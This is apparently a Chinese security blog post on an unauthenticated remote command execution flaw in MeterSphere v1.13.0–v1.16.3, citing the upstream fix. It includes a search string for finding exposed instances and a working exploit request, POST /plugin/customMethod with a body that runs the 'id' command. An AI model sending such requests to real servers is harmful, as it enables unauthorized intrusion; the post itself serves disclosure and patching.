MeterSphere customMethod 远程命令执行漏洞

漏洞描述

通过该漏洞攻击者可以在未授权的情况下执行远程代码,建议MeterSphere平台用户,尤其是可通过公网访问的用户尽快进行升级修复。

漏洞影响

MeterSphere v1.13.0 – v1.16.3

网络测绘

app=”MeterSphere”

漏洞复现

登录页面

20240513102215666-png

根据官方的修复可以看到目前版本的修复版本为删除代码片段

filterChainDefinitionMap.put(“/plugin/**”, “anon”);

https://github.com/metersphere/metersphere/pull/9140/files

20240513102256378-png (1)

查看文件 /backend/src/main/java/io/metersphere/controller/PluginController.java

20240513102337989-png (2)

发送请求包

POST /plugin/customMethod

{"entry":"Evil","request":"id"}

20240513102428539-png (3)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容